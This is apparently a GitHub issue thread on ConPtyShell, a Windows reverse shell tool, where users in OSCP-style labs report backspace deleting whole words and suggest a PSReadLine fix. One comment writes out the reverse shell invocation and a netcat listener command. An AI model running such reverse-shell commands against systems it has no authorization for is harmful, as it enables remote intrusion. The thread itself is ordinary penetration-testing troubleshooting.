### ISSUE TITLE
backspace deletes full words

### ISSUE THREAD

**Issue by senderend** [antonioCoco/ConPtyShell#13]
hi, love your tool! 

I'm noticing that within the shell, backspace deletes whole words, and Ctrl+Backspace deletes single letters. is this intended, and is there a way to change it?

**Comment by antonioCoco** [comment]
Hello,

this is an unexpected behavior. Please provide additional details to troubleshoot the issue. What commandline you used to run ConPtyShell? What commandline you used to run the netcat listener? What windows version you tested?

**Comment by santhoshkite** [comment]
Hi, I am also facing the same issue. The commands that I used was 

On the host:
Import-module .\Invoke-ConPtyShell.ps1
Invoke-ConPtyShell <your listener ip> <your listener port>

On the client:
stty raw -echo; (stty size; cat) | nc -lvnp 3001

I am using a kali Vm, the hypervisor I use is VMware Fusion.
Kali version:
Linux kali 6.6.9-arm64 #1 SMP Kali 6.6.9-1kali1 (2024-01-08) aarch64 GNU/Linux
The vm is running on Apple m1 chip.

**Comment by senderend** [comment]
hi, sorry for the delay, been busy with the OSCP exam. i ran ConPty from a reverse shell cmd command line. listener in kali linux zsh. Windows 10-11. i'm sorry i dont have more details at the moment. 

I noticed that it only seems to occur on certain hosts. I experienced this behavior in the OSCP labs but not on the exam.

**Comment by AnvithLobo** [comment]
Yeah I noticed this too. It only happens on certain hosts but didn't really have the time to compare it.

As somewhat of a fix you can run `Set-PSReadlineOption -EditMode Emacs` to mostly fix this but not sure what other issues setting this might cause. 

What I'm guessing is some hosts have a weird `PSReadLineKeyHandler` set which `Emacs` mode resets and gets you the normal behaviour
